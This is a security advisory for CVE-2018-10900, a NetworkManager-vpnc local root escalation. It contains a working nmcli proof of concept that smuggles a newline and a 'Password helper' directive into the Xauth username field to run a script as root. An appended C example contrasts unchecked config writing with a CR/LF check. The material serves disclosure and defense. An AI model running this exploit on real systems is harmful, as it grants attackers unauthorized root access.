Date: Fri, 20 Jul 2018 11:38:39 +0200
From: Lubomir Rintel <>
Subject: CVE-2018-10900: NetworkManager-vpnc-1.2.4 local privilege escalation


NetworkManager-vpnc-1.2.6 fixes a local authenticated root bug.

The bug was responsibly disclosed to us by Denis Andzakovic. Please
credit him if you issue an advisory for a product that ships the
affected code. His original advisory should be available soon at

CVE Number: CVE-2018-10900

Original Report (will be available soon):


Release Notes:

Patched Version:

The exploit code for QA and documentation purposes follows:

cat <<EOF >/tmp/helper
id >/tmp/pwned
EOF
chmod +x /tmp/helper
nmcli c add con-name poc type vpn ifname '*' vpn-type vpnc \
    "IKE DH Group = dh2" \
    "IPSec ID = bar" \
    "IPSec gateway =" \
    "IPSec secret-flags = 4" \
    "Local Port = 0" \
    "NAT Traversal Mode = natt" \
    "Perfect Forward Secrecy = server" \
    "Vendor = cisco" \
    "Xauth password-flags = 4" \
    "Xauth username = foo$(echo; echo Password helper /tmp/helper)" \
    "ipsec-secret-type = save" \
    "xauth-password-type = save"
nmcli c up poc

$ cat /tmp/pwned
uid=0(root) gid=0(root) groups=0(root)

Take care,
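
The proof of concept above puts a newline inside the "Xauth username" value so that "Password helper /tmp/helper" arrives as a line of its own. The following is an added example, not code from NetworkManager-vpnc or from the original post: a hypothetical config writer (write_item and build_config are made-up names, the one-directive-per-line "Key value" layout is assumed, and the gateway is a constructed sample value) showing the unchecked behaviour beside a check that refuses CR/LF in keys and values.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical writer, not NetworkManager-vpnc code. Appends one
 * "Key value" line to buf. With strict set, a CR or LF in either field
 * is refused, because a line-oriented parser would read the remainder
 * as a separate directive. Returns 0 on success, -1 on refusal. */
static int write_item(char *buf, size_t cap, const char *key,
                      const char *val, int strict)
{
    size_t used = strlen(buf);
    int n;

    if (strict && (strpbrk(key, "\r\n") || strpbrk(val, "\r\n")))
        return -1;
    n = snprintf(buf + used, cap - used, "%s %s\n", key, val);
    if (n < 0 || (size_t)n >= cap - used) {
        buf[used] = '\0';   /* drop a truncated line */
        return -1;
    }
    return 0;
}

/* Builds a config from constructed sample values plus the supplied
 * username. Returns the number of lines written, or -1 if refused. */
int build_config(char *buf, size_t cap, const char *username, int strict)
{
    int lines = 0;

    buf[0] = '\0';
    if (write_item(buf, cap, "IPSec gateway", "vpn.example.test", strict) ||
        write_item(buf, cap, "IPSec ID", "bar", strict) ||
        write_item(buf, cap, "Xauth username", username, strict))
        return -1;
    for (const char *p = buf; *p; p++)
        lines += (*p == '\n');
    return lines;
}

int main(void)
{
    const char *crafted = "foo\nPassword helper /tmp/helper";
    char cfg[256];

    printf("plain, strict:      %d\n", build_config(cfg, sizeof cfg, "foo", 1));
    printf("crafted, unchecked: %d\n", build_config(cfg, sizeof cfg, crafted, 0));
    printf("crafted, strict:    %d\n", build_config(cfg, sizeof cfg, crafted, 1));
    return 0;
}
```

Three settings producing four config lines in the unchecked run is the signal that one value was parsed as two directives.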
